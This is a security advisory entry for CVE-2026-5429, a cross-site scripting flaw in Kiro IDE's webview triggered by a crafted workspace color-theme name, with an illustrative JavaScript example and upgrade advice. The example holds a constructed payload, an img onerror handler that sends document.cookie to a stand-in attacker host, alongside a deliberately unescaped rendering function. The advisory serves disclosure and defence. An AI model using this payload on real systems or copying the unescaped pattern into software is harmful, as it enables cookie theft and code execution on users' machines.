CVE-2026-5429 - Kiro IDE Webview Cross-Site Scripting via Workspace Color Theme
Summary
Kiro IDE (a development environment that uses AI agents to help developers) is vulnerable to cross-site scripting (XSS) in versions before 0.8.140. The name of a workspace's color theme reaches one of the IDE's webviews without adequate escaping, so a workspace that ships a crafted theme name carries attacker-controlled markup. If a user opens that workspace and grants it trust, the injected script runs inside the webview, and the advisory reports that this results in execution of the attacker's code on the user's machine.
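The vulnerability class described above, as an added illustration that is not Kiro's code and does not reproduce the actual bug: a webview renders a workspace setting by string-concatenating it into HTML, so a theme name that contains markup becomes live DOM. The settings key, the HTML template, the function names and the constructed settings file are all assumptions for the example; the hardened variant shows the fix, which is to escape every untrusted value before it enters markup.

```javascript
// Added example of webview XSS via an attacker-controlled workspace setting.
// NOT Kiro's code: the settings key, template and function names are assumed.

// Minimal HTML escaper, sufficient for text nodes and double-quoted attributes.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Constructed workspace settings file (JSON text). The theme name is
// attacker-controlled because it travels inside the workspace itself.
const MALICIOUS_SETTINGS = JSON.stringify({
  "workbench.colorTheme":
    "<img src=x onerror=\"fetch('https://attacker.invalid/?c='+document.cookie)\">",
});

// Vulnerable pattern: the theme name is interpolated straight into HTML that
// the webview will set via innerHTML, so tags in the name are parsed as tags.
function renderThemeBannerVulnerable(settingsJson) {
  const theme = JSON.parse(settingsJson)["workbench.colorTheme"];
  return `<div class="theme">Active theme: ${theme}</div>`;
}

// Hardened pattern: the same template, but the untrusted value is escaped, so
// the browser shows the crafted name as text and never executes its handler.
function renderThemeBannerSafe(settingsJson) {
  const theme = JSON.parse(settingsJson)["workbench.colorTheme"];
  return `<div class="theme">Active theme: ${escapeHtml(theme)}</div>`;
}

// Check used below: count raw "<" characters in the rendered HTML. The
// template itself contributes exactly two (the <div> open and close tags);
// anything beyond that came from the untrusted value and is injected markup.
function countTagOpeners(html) {
  return (html.match(/</g) || []).length;
}

// Stand-alone demonstration.
const vulnerable = renderThemeBannerVulnerable(MALICIOUS_SETTINGS);
const safe = renderThemeBannerSafe(MALICIOUS_SETTINGS);
console.log("vulnerable render injects markup:", countTagOpeners(vulnerable) > 2);
console.log("safe render injects markup:     ", countTagOpeners(safe) > 2);
```

In a real webview the preferred fix is to avoid building markup from strings at all (set `element.textContent = theme` instead of `innerHTML`), and to ship the webview with a Content Security Policy that disallows inline script, which would also have blocked the `onerror` handler in the constructed payload as defence in depth. Neither of those statements describes what Kiro actually changed in 0.8.140; the advisory does not say.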
Solution / Mitigation
Update Kiro IDE to version 0.8.140 or later. Because the attack depends on the user opening and trusting the malicious workspace, treat the workspace-trust prompt as a security boundary: until the update is applied, do not trust workspaces from sources you do not control.
Original source: https://aws.amazon.com/security/security-bulletins/rss/2026-012-aws/
First tracked: April 14, 2026 at 02:00 PM